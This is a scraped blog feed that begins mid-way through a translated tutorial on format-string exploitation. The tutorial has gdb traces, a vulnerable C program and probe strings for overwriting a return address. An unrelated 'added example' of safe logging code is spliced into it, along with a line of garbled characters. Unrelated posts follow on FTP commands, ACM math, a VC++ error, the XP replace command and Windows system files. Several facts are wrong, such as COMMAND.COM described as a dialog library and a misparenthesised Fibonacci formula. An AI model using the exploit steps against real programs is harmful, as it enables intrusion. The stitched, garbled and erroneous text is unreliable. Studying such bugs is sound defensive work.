Locals at 0xbffffcb8, Previous frame's sp is 0x0
Saved registers:
  ebp at 0xbffffcb8, eip at 0xbffffcbc       ---> this is where main's return address is saved,
                                                  and also the initial value of num
(gdb) c                                      ---> let the traced program continue
Continuing.

Now we switch back to the original terminal and let our program continue:<br />[warning3@redhat-6 format]$ ./n2
Press Any Key to Continue...   ---> press Enter

Before: num = 0xbffffcbc

We switch to tty2 again to see what happened:
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.   ---> a segmentation fault occurred
0x4005dff0 in _IO_vfprintf (s=0x40104c60,
    format=0x80484d2 "%.1094795585u%n\n", ap=0xbffffcb4) at vfprintf.c:1259
1259    vfprintf.c: No such file or directory.

(gdb) x/6i $pc   ---> let us see which instructions we are about to execute
0x4005dff0 <_IO_vfprintf+4336>: movb    $0x30,(%esi)
0x4005dff3 <_IO_vfprintf+4339>: dec     %esi
0x4005dff4 <_IO_vfprintf+4340>: mov     0xfffffad8(%ebp),%eax
0x4005dffa <_IO_vfprintf+4346>: decl    0xfffffad8(%ebp)
0x4005e000 <_IO_vfprintf+4352>: test    %eax,%eax
0x4005e002 <_IO_vfprintf+4354>: jg      0x4005dff0 <_IO_vfprintf+4336>

(gdb) i r $esi
esi            0xbfffdfff       -1073750017
(gdb) i r $eax
eax            0x41412b43       1094789955      ----> 0x41412b43 more '0's still to be written
(gdb) x/200x $esi
0xbfffdfff:     0x30303000      0x30303030      0x30303030      0x30303030
0xbfffe00f:     0x30303030      0x30303030      0x30303030      0x30303030
0xbfffe01f:     0x30303030      0x30303030      0x30303030      0x30303030
0xbfffe02f:     0x30303030      0x30303030      0x30303030      0x30303030
0xbfffe03f:     0x30303030      0x30303030      0x30303030      0x30303030
0xbfffe04f:     0x30303030      0x30303030      0x30303030      0x30303030
0xbfffe05f:     0x30303030      0x30303030      0x30303030      0x30303030
0xbfffe06f:     0x30303030      0x30303030      0x30303030      0x30303030
0xbfffe07f:     0x30303030      0x30303030      0x30303030      0x30303030
0xbfffe08f:     0x30303030      0x30303030      0x30303030      0x30303030
<....>

We see that these instructions fill 0x30 ('0') towards the top of the stack (the low-address direction); in effect they are
preparing the '0's requested by "%.1094795585u" for output. It seems the stack is too small to hold that many '0's. Let us
look at the memory map of ./n2 while it runs:<br />
^Z
[1]+  Stopped                 gdb ./n2 `ps -auxw|grep './n2'|grep -v grep|awk '{print $2}'`
[warning3@redhat-6 format]$ cat /proc/28428/maps
08048000-08049000 r-xp 00000000 03:06 168475      /home/warning3/format/n2
08049000-0804a000 rw-p 00000000 03:06 168475      /home/warning3/format/n2
40000000-40012000 r-xp 00000000 03:06 144892      /lib/ld-2.1.2.so
40012000-40013000 rw-p 00012000 03:06 144892      /lib/ld-2.1.2.so
40013000-40015000 rw-p 00000000 00:00 0
40018000-40103000 r-xp 00000000 03:06 144899      /lib/libc-2.1.2.so
40103000-40107000 rw-p 000ea000 03:06 144899      /lib/libc-2.1.2.so
40107000-4010b000 rw-p 00000000 00:00 0
bfffe000-c0000000 rwxp fffff000 00:00 0

From the above we can see that the writable stack segment is the address range bfffe000-c0000000, while the instructions above
want to write 0x30 ('0') to 0xbfffdfff, an address that is no longer inside the stack segment, so a segmentation fault occurs and the
program cannot continue. Therefore, on RedHat 6.1 we cannot simply use the %.RET%n form to overwrite
a function's return address, because RET is normally in the stack segment, i.e. normally greater than 0xbfff0000, which is a rather large
number, and vfprintf() in RedHat 6.1's glibc cannot print that many '0's. The vfprintf() shipped with glibc on RedHat 6.2
can, which means that on RedHat 6.2 the statement<br />printf("%.1094795585u%n\n", num);<br />in the program above
completes normally, after which main()'s return address has been overwritten with 0x41414141.<br />I do not recommend, though, that readers run this program directly on RedHat 6.2, because it prints an enormous number of 0s and you need
plenty of patience to wait for it to finish :-)

<1> Attack method one: overwrite the return address directly
=================================

Let us look at another simple vulnerable program; we will first test the attack on RedHat 6.2:


<- begin ->  vul.c

/*  A simple vulnerable example for format bug.
 *                                              warning3@nsfocus.com
 */

#include <stdio.h>
#include <stdarg.h>
#include <unistd.h>
#include <syslog.h>

#define BUFSIZE 1024

int log(int level, char *fmt,...)
{
    char buf[BUFSIZE];
    va_list ap;

    va_start(ap, fmt);
    vsnprintf(buf, sizeof(buf)-1, fmt, ap);
    buf[BUFSIZE-1] = '\0';
    syslog(level, "[hmm]: %s", buf);
    va_end(ap);
    return 0;
}


int main(int argc, char **argv)
{

  char buf[BUFSIZE];
  int num,i;

  num = argc ;

  if(argc > 1) {
      for ( i = 1 ; i < num ; i ++ ) {
            snprintf(buf, BUFSIZE -1 , "argv[%d] = %.200s", i, argv[i]);
            buf[BUFSIZE-1] = '\0';
            log(LOG_ALERT, buf);   // here is the problem: user-controlled buf is passed as the format string
            printf("argv[%d] = %s \n", i, argv[i]);
      }
  }
  return 0;
}
<- end ->

When this buggy program calls the subroutine log(), it mistakenly puts buf in the position corresponding to fmt,
and part of buf's contents is user input, with no checking at all. Although the rest of the program is fairly
careful, using vsnprintf() and snprintf() so that no ordinary buffer overflow can occur, this format string
mistake is still fatal.<br />
Let us first analyse how an attack would proceed. We see that main() copies the command-line arguments into buf,
prefixed with the string "argv[%d] = "; when there are fewer than 10 arguments this string is
10 bytes long. Consider constructing the following string as the command-line argument:<br />"align|RET|%d%d...%.SH_RETd|%n"

"align":   used to pad the data at the start of buf to a multiple of 4 bytes
"RET":     the location of the return address of main() or log(); we will put the address of the shellcode into RET
"SH_RET":  the address where we store the shellcode
"%d...%d": these %d's are used so that the address corresponding to %n is exactly the address where RET is stored
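As an added example that is not code from the original article or from warning3, here is the logging wrapper from vul.c written in its flawed form next to the corrected form (the equivalent of calling log(LOG_ALERT, "%s", buf)), plus an input-boundary check for '%' directives. The function names log_msg_unsafe, log_msg_safe, has_conversion_spec, unsafe_result and safe_result are assumptions for illustration, and the wrappers return the formatted text instead of calling syslog() so the behaviour can be checked offline.

```c
/* Added example, not code from the original article: the vulnerable
 * logging wrapper from vul.c next to its corrected form.  The function
 * names (log_msg_unsafe, log_msg_safe, has_conversion_spec, unsafe_result,
 * safe_result) are assumptions for illustration.  Both wrappers return the
 * formatted text instead of calling syslog() so the effect can be checked
 * offline. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define BUFSIZE 1024

/* The pattern in vul.c: whatever the caller passes as fmt is interpreted by
 * vsnprintf(), so '%' directives in user-controlled text are executed. */
static int log_msg_unsafe(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(out, outlen, fmt, ap);   /* fmt may be attacker data */
    va_end(ap);
    return n;
}

/* Corrected form, equivalent to calling log(LOG_ALERT, "%s", buf) in vul.c:
 * the format string is a constant and the user text is only ever a %s
 * argument, so any '%' in it is copied literally. */
static int log_msg_safe(char *out, size_t outlen, const char *user_text)
{
    return snprintf(out, outlen, "[hmm]: %s", user_text);
}

/* Defensive check for an input boundary: does the string contain a
 * conversion specification?  "%%" is a literal percent and is allowed. */
static int has_conversion_spec(const char *s)
{
    const char *p = strchr(s, '%');

    while (p != NULL) {
        if (p[1] != '%')
            return 1;           /* "%d", "%n", "%x", a trailing '%', ... */
        p = strchr(p + 2, '%'); /* skip the escaped "%%" */
    }
    return 0;
}

/* Small helpers that return the formatted text from a static buffer
 * (constructed for the demonstration). */
static char g_line[BUFSIZE];

static const char *unsafe_result(const char *user_text)
{
    log_msg_unsafe(g_line, sizeof g_line, user_text);   /* user text as format */
    return g_line;
}

static const char *safe_result(const char *user_text)
{
    log_msg_safe(g_line, sizeof g_line, user_text);
    return g_line;
}

int main(void)
{
    /* Constructed sample inputs.  The "%%" input is harmless even for the
     * unsafe wrapper (it consumes no argument); the article's probe string
     * is only given to the safe wrapper, which logs it verbatim instead of
     * interpreting it. */
    const char *pct = "rate 100%%";
    const char *probe = "xxabcd%d%d%d%d%d%n";

    printf("unsafe(\"%s\") -> \"%s\"\n", pct, unsafe_result(pct));
    printf("safe(\"%s\")   -> \"%s\"\n", pct, safe_result(pct));
    printf("safe(\"%s\") -> \"%s\"\n", probe, safe_result(probe));
    printf("has_conversion_spec(probe) = %d\n", has_conversion_spec(probe));
    return 0;
}
```

The unsafe wrapper collapses "%%" to a single "%", showing that the text was parsed as a format; the safe wrapper reproduces the input byte for byte, so "%n" in it is just two characters in the log line. The boundary check is a defence in depth for places where a format string really must be built from pieces; the primary fix is the constant format string.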

Let us look at the stack at the first call of log():

   saved ebp  saved eip  arg 1     arg 2   var i   var num   buffer buf
-----------------------------------------------------------------------
|  EBP  |  EIP  |LOG_ALERT| &buf |  i  |  num  |"argv[1] = "| argv[1] |
-----------------------------------------------------------------------
                             ^      ^
                             |__fmt |__ap
low addr  ---------------------->---------------------------------->  high addr

聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
After va_start(ap, fmt) has executed, the variable-argument pointer ap points to the address following fmt, i.e. the address of
main()'s local variable i. If the argv[1] we supply is the following string:
"xxabcd%d%d%d%d%d%p"
then the stack looks like this:


 saved ebp  saved eip  arg 1     arg 2  var i  var num   buffer buf
--------------------------------------------------------------------------------
|  EBP  |  EIP  |LOG_ALERT| &buf |  i | num |"argv[1] = xx"|"abcd"|%d%d%d%d%d%p|
--------------------------------------------------------------------------------
                             ^      ^ 4B   4B       12B      ^  RET           |
                             |__fmt |__ap                    |________________|

low addr  ---------------------->---------------------------------->  high addr

Because "argv[1] = " is 10 bytes long, we use the two bytes "xx" to round it up to a multiple of 4, 12 bytes. Thus,
from the address of variable i to "abcd" there are 4+4+12=20 bytes; 20/4=5, so we need 5 %d's to consume these 5
addresses, and then the last conversion %p corresponds to the address of "abcd", so the output should be:
"0x64636261"

[root@rh62 format]# ./vul xxabcd%d%d%d%d%d%p
argv[1] = xxabcd%d%d%d%d%d%p
[root@rh62 format]# tail -1 /var/log/messages
Jul 12 04:13:08 rh62 vul: [hmm]: argv[1] = xxabcd2119864909775429783952021138493
0x64636261

Note the final 0x64636261: this shows that our analysis above was correct. If we replace %p with %n, vsnprintf()
will store the output length at 0x64636261, which of course causes a segfault<br />
[root@rh62 format]# gdb ./vul
GNU gdb 19991004
<...>
(gdb) r xxabcd%d%d%d%d%d%n
Starting program: /root/./vul xxabcd%d%d%d%d%d%n


Program received signal SIGSEGV, Segmentation fault.
0x400622b7 in _IO_vfprintf (s=0xbffff224,
    format=0xbffff738 "argv[1] = xxabcd%d%d%d%d%d%n", ap=0xbffff748)
    at vfprintf.c:1212
1212    vfprintf.c: No such file or directory.
(gdb) x/i $pc
0x400622b7 <_IO_vfprintf+2455>: mov     %eax,(%ecx)
(gdb) i reg $eax $ecx
eax            0x2f     47
ecx            0x64636261       1684234849
(gdb)

We see that eax holds the total printed length, 47, and vsnprintf() segfaulted while storing this value at $ecx.
If we replace RET with the address where main's return address is saved, the length will be stored
there; and if this length happens to equal the address where we stored the shellcode, then when main() returns
it will jump to our shellcode.

Asp 2006-10-20 20:54
]]>
FTP command referencehttp://m.shnenglu.com/asp/archive/2006/10/20/13920.htmlAspAspFri, 20 Oct 2006 12:48:00 GMThttp://m.shnenglu.com/asp/archive/2006/10/20/13920.htmlhttp://m.shnenglu.com/asp/comments/13920.htmlhttp://m.shnenglu.com/asp/archive/2006/10/20/13920.html#Feedback0http://m.shnenglu.com/asp/comments/commentRss/13920.htmlhttp://m.shnenglu.com/asp/services/trackbacks/13920.htmlThe FTP command is one of the commands Internet users use most often; knowing FTP's internal commands well and applying them flexibly makes life much easier for the user and gets twice the result for half the effort.<br />If you want to learn to run FTP downloads in the background, you must learn the FTP commands.<br />The FTP command-line format is: ftp -v -d -i -n -g [hostname], where<br />-v shows all responses from the remote server;<br />
-n disables ftp's automatic login, i.e. the .netrc file is not used;<br />-d uses debug mode;<br />-g disables file name globbing.<br />FTP's internal commands are as follows (square brackets denote optional items):<br />
1. ![cmd[args]]: run an interactive shell on the local machine; exit returns to the ftp environment, e.g. !ls *.zip<br />
2. $ macro-name[args]: run the macro definition macro-name.<br />3. account[password]: supply the supplementary password needed to access system resources after logging in to the remote system successfully.<br />4. append local-file[remote-file]: append a local file to a file on the remote host; if no remote file name is given, the local file name is used.<br />5. ascii: use the ascii transfer type.<br />6. bell: ring the bell after each command completes.<br />7. bin: use binary file transfer mode.<br />8. bye: exit the ftp session.<br />9. case: when using mget, convert upper-case letters in remote file names to lower case.<br />10. cd remote-dir: change to the given directory on the remote host.<br />11. cdup: change to the parent of the current remote directory.<br />12. chmod mode file-name: set the access mode of the remote file file-name to mode, e.g. chmod 777 a.out.<br />13. close: end the ftp session with the remote server (the counterpart of open).<br />14. cr: when transferring files in ascii mode, convert carriage-return/line-feed to line-feed.<br />15. delete remote-file: delete a remote file.<br />16. debug[debug-value]: set debug mode, showing every command sent to the remote host, e.g. deb up 3; a value of 0 turns debugging off.<br />17. dir[remote-dir][local-file]: list the remote directory and save the result to a local file<br />
18. disconnect: same as close.<br />19. form format: set the file transfer form to format; the default is file.<br />20. get remote-file[local-file]: transfer the remote file remote-file to local-file on the local disk.<br />21. glob: toggle file name expansion for mdelete, mget and mput; by default file names are not expanded, the same as the -g command-line option.<br />22. hash: print a hash mark (#) for every 1024 bytes transferred.<br />23. help[cmd]: show help for the ftp internal command cmd, e.g. help get.<br />24. idle[seconds]: set the remote server's inactivity timer to [seconds] seconds.<br />25. image: set binary transfer mode (same as binary).<br />26. lcd[dir]: change the local working directory to dir.<br />27. ls[remote-dir][local-file]: list the remote directory remote-dir and save it to the local file local-file.<br />28. macdef macro-name: define a macro; the definition ends at the blank line following macdef.<br />29. mdelete[remote-file]: delete remote files.<br />30. mdir remote-files local-file: like dir, but several remote files can be given, e.g. mdir *.o.*.zipoutfile.<br />31. mget remote-files: transfer several remote files.<br />32. mkdir dir-name: create a directory on the remote host.<br />33. mls remote-file local-file: same as nlist, but several file names can be given.<br />34. mode[modename]: set the file transfer mode to modename; the default is stream.<br />35. modtime file-name: show the last modification time of a remote file.<br />36. mput local-file: transfer several files to the remote host.<br />37. newer file-name: if the modification time of file-name on the remote machine is more recent than that of the file of the same name on the local disk, transfer the file again.<br />38. nlist[remote-dir][local-file]: list the files of the remote directory and save the list to local-file on the local disk.<br />39. nmap[inpattern outpattern]: set a file name mapping so that certain characters in file names are converted during transfer, e.g. nmap $1.$2.$3[$1,$2].[$2,$3]: when the file a1.a2.a3 is transferred its name becomes a1,a2. This command is especially useful when the remote host is a non-UNIX machine.<br />40. ntrans[inchars[outchars]]: set the file name character translation, e.g. ntrans1R turns the file name LLL into RRR.<br />41. open host[port]: connect to the given ftp server; a connection port can be specified.<br />42. passive: enter passive transfer mode.<br />43. prompt: toggle interactive prompting when transferring several files.<br />44. proxy ftp-cmd: execute an ftp command on a secondary control connection; this allows connecting to two ftp servers and transferring files between them. The first ftp command must be open, to establish the connection between the two servers first.<br />45. put local-file[remote-file]: send the local file local-file to the remote host.<br />46. pwd: show the current working directory on the remote host.<br />47. quit: same as bye, exit the ftp session.<br />48. quote arg1,arg2...: send the arguments verbatim to the remote ftp server, e.g. quote syst.
49. recv remote-file[local-file]: same as get.<br />50. reget remote-file[local-file]: like get, but if local-file exists, resume from where the last transfer was interrupted.<br />51. rhelp[cmd-name]: request help from the remote host.<br />52. rstatus[file-name]: if no file name is given, show the status of the remote host, otherwise the status of the file.<br />53. rename[from][to]: rename a remote file.<br />54. reset: clear the reply queue.<br />55. restart marker: restart get or put from the given marker, e.g. restart 130.<br />56. rmdir dir-name: delete a remote directory.<br />57. runique: store received files under unique names; if the file exists, the suffix .1, .2, etc. is appended to the original file name.<br />58. send local-file[remote-file]: same as put.<br />59. sendport: toggle the use of the PORT command.<br />60. site arg1,arg2...: send the arguments verbatim as a SITE command to the remote ftp host.<br />61. size file-name: show the size of a remote file, e.g. site idle 7200.<br />62. status: show the current ftp status.<br />63. struct[struct-name]: set the file transfer structure to struct-name; the default is stream.<br />64. sunique: store files on the remote host under unique names (the counterpart of runique).<br />65. system: show the operating system type of the remote host.<br />66. tenex: set the file transfer type to that required by TENEX machines.<br />67. tick: toggle the byte counter during transfers.<br />68. trace: toggle packet tracing.<br />69. type[type-name]: set the file transfer type to type-name; the default is ascii, e.g. type binary sets binary transfer mode.<br />70. umask[newmask]: set the remote server's default umask to newmask, e.g. umask 3
71. user user-name[password][account]: identify yourself to the remote host; when a password is required it must be entered, e.g. user anonymous
my@email.<br />72. verbose: same as the -v command-line option, i.e. verbose reporting mode: all responses from the ftp server are shown to the user; the default is on.
73. ?[cmd]: same as help.


Asp 2006-10-20 20:48
]]>A little mathematics used in ACM</title><link>http://m.shnenglu.com/asp/archive/2006/10/14/13665.html</link><dc:creator>Asp</dc:creator><author>Asp</author><pubDate>Sat, 14 Oct 2006 03:24:00 GMT</pubDate><guid>http://m.shnenglu.com/asp/archive/2006/10/14/13665.html</guid><wfw:comment>http://m.shnenglu.com/asp/comments/13665.html</wfw:comment><comments>http://m.shnenglu.com/asp/archive/2006/10/14/13665.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://m.shnenglu.com/asp/comments/commentRss/13665.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/asp/services/trackbacks/13665.html</trackback:ping><description><![CDATA[1. Fermat's little theorem: a^p mod p = a (p prime, and a not a multiple of p)<br /><br />2. Number of divisors of n:<br />factor n as p1^s1*p2^s2*…*pm^sm<br />then the number of divisors is (s1+1)*(s2+1)*…*(sm+1)<br /><br />3. Closed form of the Fibonacci numbers: Fn=round((1+√5)/2)^n/√5<br /><br />4. Closed form of the Catalan numbers: Cn=C(2n-2,n-1)/n<br />recurrence: Cn=∑Ci*C(n-i) (i=1..n-1, C1=C2=1)<br /><br />5. Stirling numbers of the second kind: S(n,k) is the number of ways to partition a set of n elements into k parts<br />S(n,k)=S(n-1,k-1)+k*S(n-1,k)<br /><br />6. Integer partitions: P(n,k) is the number of ways to split the integer n into k parts<br />P(n,k)=P(n-1,k-1)+P(n-k,k)<br /><br />7. Number of solutions of x1+x2+…+xk=n (xi>=0): C(n+k-1,k-1)<br />Number of solutions of x1+x2+…+xk=n (xi>0): C(n-1,k-1)<br /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/asp/" target="_blank">Asp</a> 2006-10-14 11:24 <a href="http://m.shnenglu.com/asp/archive/2006/10/14/13665.html#Feedback" target="_blank" style="text-decoration:none;">Post a comment</a></div>]]></description></item><item><title>Compiling... 
,Error spawning cl.exehttp://m.shnenglu.com/asp/archive/2006/10/08/13465.htmlAspAspSun, 08 Oct 2006 12:09:00 GMThttp://m.shnenglu.com/asp/archive/2006/10/08/13465.htmlhttp://m.shnenglu.com/asp/comments/13465.htmlhttp://m.shnenglu.com/asp/archive/2006/10/08/13465.html#Feedback10http://m.shnenglu.com/asp/comments/commentRss/13465.htmlhttp://m.shnenglu.com/asp/services/trackbacks/13465.html    Today, after a classmate installed MS VC++ 6.0, compiling a program produced this message: Compiling... ,Error spawning cl.exe. Reinstalling did not help at all, very frustrating... Later, just as we were about to get another disc and reinstall, we noticed something in VC's Tools -> Options -> Directories: the directories under Include Files, Executable Files, Library Files and Source Files were all wrong. We had installed VC++ to "D:\Program Files\Microsoft Visual Studio\VC98", but every entry there said "C:\Program Files\Microsoft Visual Studio\VC98". We changed them right away, tried again, OK, it compiled... heh heh...<br />    Searching the web afterwards, we learned that cl.exe is VC++'s real compiler; with the wrong directory the program cannot be found, hence the error. Embarrassing, but still something learned...</font>

Asp 2006-10-08 20:09
]]>
Prime numbers up to 100000http://m.shnenglu.com/asp/archive/2006/10/06/13400.htmlAspAspFri, 06 Oct 2006 14:50:00 GMThttp://m.shnenglu.com/asp/archive/2006/10/06/13400.htmlhttp://m.shnenglu.com/asp/comments/13400.htmlhttp://m.shnenglu.com/asp/archive/2006/10/06/13400.html#Feedback18http://m.shnenglu.com/asp/comments/commentRss/13400.htmlhttp://m.shnenglu.com/asp/services/trackbacks/13400.htmlRead the full article

Asp 2006-10-06 22:50
]]>
A very powerful command in XP</title><link>http://m.shnenglu.com/asp/archive/2006/10/01/13204.html</link><dc:creator>Asp</dc:creator><author>Asp</author><pubDate>Sun, 01 Oct 2006 10:26:00 GMT</pubDate><guid>http://m.shnenglu.com/asp/archive/2006/10/01/13204.html</guid><wfw:comment>http://m.shnenglu.com/asp/comments/13204.html</wfw:comment><comments>http://m.shnenglu.com/asp/archive/2006/10/01/13204.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://m.shnenglu.com/asp/comments/commentRss/13204.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/asp/services/trackbacks/13204.html</trackback:ping><description><![CDATA[    XP has a very powerful command for replacing files, replace; it can even replace files that are currently in use. Extremely powerful. For example: create a directory under C:, c:aaa, then copy an mp3 to c:aaa and name it c:aaaa.mp3, then copy another song to C:a.mp3, then play c:aaaa.mp3 with Media Player, and at the command prompt type: replace c:a.mp3 c:aaa. After a moment, has the song being played changed to the other one? <p>Using this command to replace system files is really great, and XP's system file protection has no effect on it. No more going into safe mode to replace files. </p><p>Format </p><p>REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W] </p><p>REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W] </p><p>[drive1:][path1]filename Specifies the source file(s). </p><p>[drive2:][path2] Specifies the directory where files are to be replaced. </p><p>/A Adds new files to the destination directory. Cannot be used with the /S or /U switch. /P Prompts for confirmation before replacing a file or adding a source file. /R Replaces read-only files as well as unprotected files. /S Replaces files in all subdirectories of the destination directory. Cannot be used with the /A switch. </p><p>/W Waits for you to insert a disk before running. </p><p>/U Replaces (updates) only files that are older than the source files. Cannot be used with the /A switch. </p><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/asp/" target="_blank">Asp</a> 2006-10-01 18:26 <a href="http://m.shnenglu.com/asp/archive/2006/10/01/13204.html#Feedback" target="_blank" style="text-decoration:none;">Post a comment</a></div>]]></description></item><item><title>Windows system files explainedhttp://m.shnenglu.com/asp/archive/2006/10/01/13203.htmlAspAspSun, 01 Oct 2006 10:25:00 GMThttp://m.shnenglu.com/asp/archive/2006/10/01/13203.htmlhttp://m.shnenglu.com/asp/comments/13203.htmlhttp://m.shnenglu.com/asp/archive/2006/10/01/13203.html#Feedback0http://m.shnenglu.com/asp/comments/commentRss/13203.htmlhttp://m.shnenglu.com/asp/services/trackbacks/13203.html
A.
ACCESS.CHM - Windows help file
ACCSTAT.EXE - accessibility status indicator
ADVAPI32.DLL - advanced Win32 application programming interface
AHA154X.MPD - SCSI driver
AM1500T.VXT - network card driver
AM2100.DOS - network card driver
APPSTART.ANI - animated cursor
APPS.HLP - Windows help file
AUDIOCDC.HLP - "Codec" help file
AWARDPR32.EXE - Add Printer tool

B.
BIGMEM.DRV - BIGMEM virtual device
BILLADD.DLL - dynamic link library (MSW support)
BIOS.VXD - Plug and Play BIOS interface
BUSLOGIC.MPD - SCSI driver

C.
CALC.EXE - Calculator application
CANNON800.DRV - Canon printer driver
CHOICE.COM - MSDOS command
CHS16.FON - font file (16-dot matrix Chinese)
CANYON.MID - sample MIDI file
CARDDRV.EXE - PCMCIA support program
CDFS.VXD - CDROM file system
CDPLAYER.EXE - CD Player application
CDPLAYER.HLP - CD Player help file
CHIPS.DRV - Chips & Technologies display driver
CHKDSK.EXE - DOS disk check tool
CHOOSUSR.DLL - network client
CHOKD.WAV - sample sound file
CIS.SCP - script file (demonstrates how to establish a PPP connection to CompuServe)
CLAIRE~1.RMI - MIDI sequence
CLIP.INF - setup information file (Clipboard Viewer)
CLOSEWIN.AVI - video clip (AVI) (how to close a window)
CMC.DLL - Mail API 1.0 common messaging calls
COMBUFF.VXD - COM port virtual device
COMCTL32.DLL - 32-bit shell component
COMDLG32.DLL - 32-bit common dialog library
COMIC.TIF - TrueType font file (Comic Sans MS)
COMMAND.COM - common dialog library
COMMDLG.DLL - 16-bit common dialog library
COMMON.HLP - OLE help file
COMPOBJ.DLL - OLE 16/32 interoperability library
CONAGEN.EXE - 32-bit control support
CONFAPI.DLL - Microsoft Network component
CONFIG.SYS - configuration file
CONFIG.TXT - readme file (how to use commands in the configuration file)
CONTROL.EXE - "Control Panel" application
COOL.DLL - uniform resource locator file
COPY.INF - setup information file
CP-1250.NLS - natural language support file
CPQNDIS.DOS - network card driver
CPQNDIS3.VXD - Compaq Ethernet controller NDIS driver
CR3240.EXE - DOS 6.22 Chinese edition CR3240 printer driver
CRTDLL.DLL - Microsoft C runtime library
CSETUP.EXE - MSDOS 6.22 Chinese setup program
CSETUP.WIN - CSetup.exe support file
CSMAPPER.SYS - system file (PCMCIA support)
CSPMAN.DLL - dynamic link library (SoundBlaster 16 driver)
CTRLPAN.EXE - MSDOS command (system console program)
CTRLPAN.EXE - MSDOS 6.22 Chinese edition control program

D.
DBLBVFF.SYS - double-buffer driver
DC21X4.SYS - NDIS3 driver
DCIMAN.DLL - display control interface
DCIMAN32.DLL - display control interface
DDEML.DLL - DDE message library
DEBMP.DLL - raster display device
DEBUG.EXE - Debug debugging tool
DECPSMW4.INF - setup information file (DEC printer installation)
DECLAN.VXD - DECLAN network card driver
DEFRAG - opens the "Select Drive" window
DEL.INF - setup information file
DELTEMP.COM - initialization helper tool
DELTREE.EXE - directory deletion tool
DEMET.DLL - vector display engine
DESKCP16.DLL - 16-bit desktop control panel
DESKTOP.MSN - Microsoft Network component
DESS.DLL - spreadsheet display engine
DEWP.DLL - word processor display engine
DIALER.CNT - dialog help
DIALER.EXE - Phone Dialer program
DIALER.HLP - Phone Dialer help file
DIALMON.EXE - dial-up monitor program (IE 2.0)
DIBENG.DLL - device-independent bitmap engine
DICONIX.DRX - printer driver
DIRECTCC.EXE - Direct Cable Connection application
DISKCOMP - disk compare tool
DISKCOPY.COM - disk copy tool
DISKDRV.INF - setup information
DISPLAY.TXT - display card README file
DMCOLOR.DLL - universal printer driver color printing support library
DOSKEY.COM - DOS command
DOSX.EXE - MSDOS configuration program
DRAGDROP.AVI - video clip (AVI) (how to use drag and drop)
DRIVER.SYS - DOS driver
DRVSPACE.EXE - disk compression tool
DRVSPACE.HLP - disk space management help file

E.
EDIT.COM - DOS text editor
EDLIN.EXE - DOS line editor
EE16.VXD - virtual device driver
EISA.VXD - Plug and Play EISA bus counter
EK550C.ICM - printer profile
EMM386.EXE - expanded memory manager
ENABLE.INF - initialization information
ENGCT.EXE - MSN support file
ESCP24SC.DRV - device driver
EUDCEDIT.CNF - help index file (Private Character Editor)
EUDCEDIT.EXE - Private Character Editor
EUDCEDIT.HLP - help file (Private Character Editor)
EUDCEDIT.INF - setup information file (Private Character Editor)
EVX16.DOS - network card driver
EWRK3.DOS - network card driver
EWRK3.SYS - network card driver
EXCEL.XLS - Excel 5.0 file template
EXCEL4.XLS - Excel 4.0 file template
EXCHANGE.TXT - readme file for Inbox and Exchange
EXCHNG.CNT - Mail/Exchange help file contents
EXCHNG.HLP - Mail/Exchange component
EXCHNG32.EXE - performs the initial setup of Exchange for the user
EXPLORER.AVI - video clip (AVI) (how to use Explorer)
EXPLORER.EXE - "Explorer" application
EXPO.HLP - help file (product information)
EXPOSTRT.EXE - product information application
EXTRACT.EXE - decompression tool
EXTRA.TXT - readme file (additional online access file)

F.
FAQ.TXT - FAQ readme file
FAXCODEC.DLL - fax encoder/decoder
FAXCOVER.EXE - cover page editor
FC.EXE - DOS command, compares two files
FD16-700.MPD - SCSI driver
FD8XX.MPD - SCSI driver
FDISK.EXE - DOS command, creates, deletes and displays the current partitions on the hard disk
FILESEC.VXD - file access control manager
FILEXFER.CNT - file transfer help file contents
FILEXFER.EXE - Microsoft File Transfer
FIND.AVI - video clip (how to use Find)
FIND.EXE - command that searches for a specified string
FINDMVI.DLL - Media Vision support
FINSTALL.DLL - font installer
FINSTALL.HLP - font installer help file
FLSIMTD.VXD - PCMCIA support
FONT16.EXE - DOS 6.22 Chinese edition 16-dot matrix font driver
FONTS.INF - font selection initialization information
FONTVIEW.EXE - font viewer
FORMAT.COM - DOS disk formatting tool
FOUTLINE.EXE - outline font driver
FRAMEBUF.DRV - SVGA display driver
FTE.DLL - sound browser file transfer engine file
FTP.EXE - File Transfer Protocol TCP tool
FURELI~1.RMI - MIDI sequence

G.
GBK.TXT - Chinese Windows 95 GBK code set character definition table
GDI.EXE - simplified WIN 3.1 graphics interface
GDI32.DLL - 32-bit GDI graphics interface
GENERAL.IDF - general MIDI indicator
GRPCONV.EXE - Windows program group converter
GUIDE.EXE - application (MSN)

H.
HARDWARE.TXT - hardware readme file
HOSTS.SAM - TCP configuration
HPCLRLSK.ICM - printer profile
HPDESK.ICM - printer profile table
HPDSKJET.DRV - printer driver
HPEISA.VXD - network adapter driver
HPJAHLP.CNT - JetAdmin program help file
HPJD.DLL - HP JetAdmin support program
HPLAN.DOS - network adapter driver
HPLJ300.DRV - HP LJ 300 DPI printer driver
HPLJ300.EXE - MSDOS command (HP printer driver)
HPLJ-31.SPD - printer driver
HPLJ600.DRV - HP LJ 600 DPI printer driver
HPLJP-V4.INF - printer setup information
HPNETPRN.INF - HP JetAdmin support program
HPPJXL31.SPD - printer driver
HPPLOT.DRV - printer driver
HPPLOT.HLP - printer driver help file
HPPRARBK.DLL - HP JetAdmin support program
HPPRARRK.HLP - HP JetAdmin support program help file
HPVCM.HPM - printer driver
HSFLOP.PDR - HSFLOP virtual device
HTICONS.DLL - terminal device dynamic link library
HYPERTRM.CNT - terminal device help file
HYPERTRM.EXE - terminal device application
